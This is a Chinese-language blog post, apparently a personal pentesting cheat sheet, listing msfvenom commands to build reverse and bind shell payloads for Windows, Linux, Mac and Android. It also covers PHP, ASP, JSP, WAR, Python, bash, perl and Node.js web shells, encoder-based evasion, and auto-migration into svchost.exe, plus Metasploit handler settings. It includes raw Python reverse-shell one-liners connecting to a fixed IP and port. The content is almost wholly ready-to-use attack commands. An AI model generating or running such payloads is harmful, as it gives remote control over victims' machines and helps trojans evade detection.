msfvenom生成payload
ssooking Lv5
  2016-11-15 17:22:00 2016-11-15 17:22    

msfvenom重要参数

查看payloads: msfvenom -l payloads
查看支持的文件格式:msfvenom -l formats
查看payload所需参数:msfvenom -p xxx --list-options
查看编码器:msfvenom --list encoders
编码参数使用示例:

1
-e x86/shikata_ga_nai -i 5 -b '\x00\x0A\x0D' //使用shikata_ga_nai编码器编码5次并去除会造成截断的坏字符

在生成 shellcode时记得加-b参数

1
msfvenom -a x86 -p windows/messagebox TEXT="Exploit test!" -e x86/shikata_ga_nai -i 5 -b '\x00\x0A\x0D' -f raw

常用payload

1
2
3
4
5
6
7
windows/exec cmd=calc.exe
windows/shell_bind_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/meterpreter_reverse_tcp

System Payloads

后面以tcp反弹shell为例。

Linux

1
2
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f elf -o shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=123.207.15.73 LPORT=9999 -f elf -o shell.elf

Windows

messagebox Test

1
2
msfvenom -a x86 -p windows/messagebox Title="ssooking" TEXT="hello, it is a test" -f exe -o hello.exe
msfvenom -p windows/messagebox Title="ssooking" TEXT="hello, it is a test" -f exe -o hello.exe  #64位

windows下生成32位/64位payload时需要注意系统架构相同。

1
2
3
msfvenom -a x86 --platform windows -p windows/shell_bind_tcp RHOST=xxx RPORT=xxx -f exe -o shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe -o shell.exe

windows/meterpreter/reverse_tcp为例,该payload默认为32位,也可使用-a x86选项指定。

如果要生成64位,则payload为windows/x64/meterpreter/reverse_tcp

Netcat

nc正向连接

1
msfvenom -p windows/shell_hidden_bind_tcp LPORT=xxx AHOST=xxx -f exe -o 1.exe

AHOST:允许连接的主机

nc反弹连接

1
msfvenom -p windows/shell_reverse_tcp LHOST=xxx LPORT=xxx -f exe -o 1.exe

Mac

1
msfvenom -p osx/x86/shell_reverse_tcp LHOST=xxx LPORT=xxx -f macho -o shell.macho

Android

1
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.apk

Web Payloads

php

1
2
msfvenom -p php/meterpreter_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' -o shell.php && pbpaste -o-o shell.php

asp

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f asp -o shell.asp

jsp

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp

war

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f war -o shell.war

python

1
2
msfvenom -p cmd/unix/reverse_python LHOST=xxx LPORT=xxx -f raw -o shell.py
msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.py

正向shell

1
2
3
python/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.176.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

python/python3 -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('172.16.176.1',9999))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

bash

1
msfvenom -p cmd/unix/reverse_bash LHOST=xxx LPORT=xxx -f raw -o shell.sh

perl

1
msfvenom -p cmd/unix/reverse_perl LHOST=xxx LPORT=xxx -f raw -o shell.pl

nodejs

1
msfvenom -p nodejs/shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.js

MSF监听

1
2
3
4
5
6
7
8
use exploit/multi/handler
set PAYLOAD <Payload name>
set RHOST <RHOST value>
set RPORT <RPORT value>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

直接快速进行监听

1
msf5 > handler -H <RHOST/LHOST> -P <RPORT/LPORT> -p windows/meterpreter/reverse_tcp

其他设置

自动执行脚本

如:自动执行post/windows/manage/migrate 模块,该模块的功能注入其他进程

1
set AutoRunScript post/windows/manage/migrate

自动注入进程

1
2
set prependmigrate true
set prependmigrateProc svchost.exe

PS:一些高级参数在使用msfvenom生成木马的时候就可以设置,如直接生成能够自动注入svchost.exe的木马。

1
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -e x86/shikata_ga_nai -i 5 -b '\x00\x0A\x0D' PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o  shell.exe

handler高级配置

show advanced查看高级配置参数:

1
2
3
4
set exitonsession false //可以让建立监听的端口继续保持侦听,可以接受多个session
set stagerverifysslcert false //防止获取shell的时候出现的SSL_accept错误
set SessionCommunicationTimeout 0  //防止会话在长时间(默认存活300秒,5分钟)无操作时被杀死
set SessionExpirationTimeout 0 //防止会话将被强制关闭(默认保留604800秒,一周)
  • Post title:msfvenom生成payload
  • Post author:ssooking
  • Create time:2016-11-15 17:22:00
  • Post link:https://ssooking.github.io/2016/11/msfvenom生成payload/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.